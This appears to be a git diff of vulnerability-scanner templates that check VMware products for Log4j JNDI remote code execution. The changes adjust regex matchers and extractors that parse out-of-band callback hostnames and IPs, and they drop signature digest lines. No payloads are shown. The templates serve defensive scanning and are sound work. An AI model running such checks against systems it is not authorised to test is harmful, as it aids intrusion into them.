@@ -49,20 +49,21 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output part: interactsh_request -# digest: 4a0a004730450220022242a54624b114b3874d75963250ea54ad342e3e3991395d5dd6346915d36f022100b336a35af96afd9093735c3d2e75fd2324bd5b53870017395dd8aa690217e500:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/vmware/vmware-horizon-log4j-jndi-rce.yaml b/http/vulnerabilities/vmware/vmware-horizon-log4j-jndi-rce.yaml index 9b6ce47803..344eef197e 100644 --- a/http/vulnerabilities/vmware/vmware-horizon-log4j-jndi-rce.yaml +++ b/http/vulnerabilities/vmware/vmware-horizon-log4j-jndi-rce.yaml @@ -47,4 +47,3 @@ http: regex: - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output part: interactsh_request -# digest: 4a0a00473045022037762439401b8e794c524db32078ec70147f5bd2f5d61e70feb310d8877d5f5e022100b1e9fa52d2f223d67b072aa79b77cd6219eee33cf4de20310f86d5b7334046e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/vmware/vmware-nsx-log4j.yaml b/http/vulnerabilities/vmware/vmware-nsx-log4j.yaml index 416e3290ca..f4677deee3 100644 --- a/http/vulnerabilities/vmware/vmware-nsx-log4j.yaml +++ b/http/vulnerabilities/vmware/vmware-nsx-log4j.yaml 
@@ -50,20 +50,21 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: - part: interactsh_request -# digest: 4b0a00483046022100de5736c6ce7f7d3cde69a2e0b68dbcb3d44d75442ce8024f8e94ed882c22914b022100e671a3a611ebad279c50c74614df1051719b65144eacaca257ae7cec0689b162:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request \ No newline at end of file diff --git a/http/vulnerabilities/vmware/vmware-operation-manager-log4j.yaml b/http/vulnerabilities/vmware/vmware-operation-manager-log4j.yaml index 1d45e46cbd..b6d731cdc7 100644 --- a/http/vulnerabilities/vmware/vmware-operation-manager-log4j.yaml +++ b/http/vulnerabilities/vmware/vmware-operation-manager-log4j.yaml 
@@ -53,20 +53,21 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: - part: interactsh_request -# digest: 490a0046304402203de29e9803f4ef5d0af4870eac8a7559cb0124cdcce62acecbc5d0f83cbc331402203de349240afecbda2e739f4191a4a5a6da4cf41935d45144331269006cfd2baf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request \ No newline at end of file diff --git a/http/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml b/http/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml index 427a6b5c9d..df7e7dead1 100644 --- a/http/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml +++ b/http/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml @@ -46,5 +46,4 @@ http: group: 1 regex: - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output - part: interactsh_request -# digest: 490a0046304402207920ddfc8c0eb3d1df6bd2272ec73cd6463d4a06f8961a56a0cd9ed1de8aeb3e02202d3bc3a237cad422f7980e7374968252d9dc1f23aa56625989791f6d2bc50608:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + part: interactsh_request \ No newline at end of file diff --git a/http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml b/http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml index a79cb112aa..2c71e9c5b9 100644 --- a/http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml 
+++ b/http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml @@ -47,20 +47,21 @@ http: - type: regex part: interactsh_request regex: - + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output extractors: - type: kval kval: - + - interactsh_ip # Print remote interaction IP in output - type: regex group: 2 regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output part: interactsh_request - type: regex group: 1 regex: - part: interactsh_request -# digest: 4a0a00473045022100aa7ea5068d17343a5be70930a9bb13dcb42a1e6ba099de3e3e69e3944aa40cf002204c515e1344683fe8623e77e52f70cf37eb4136152fc0cf05b832501e897d315f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output + part: interactsh_request \ No newline at end of file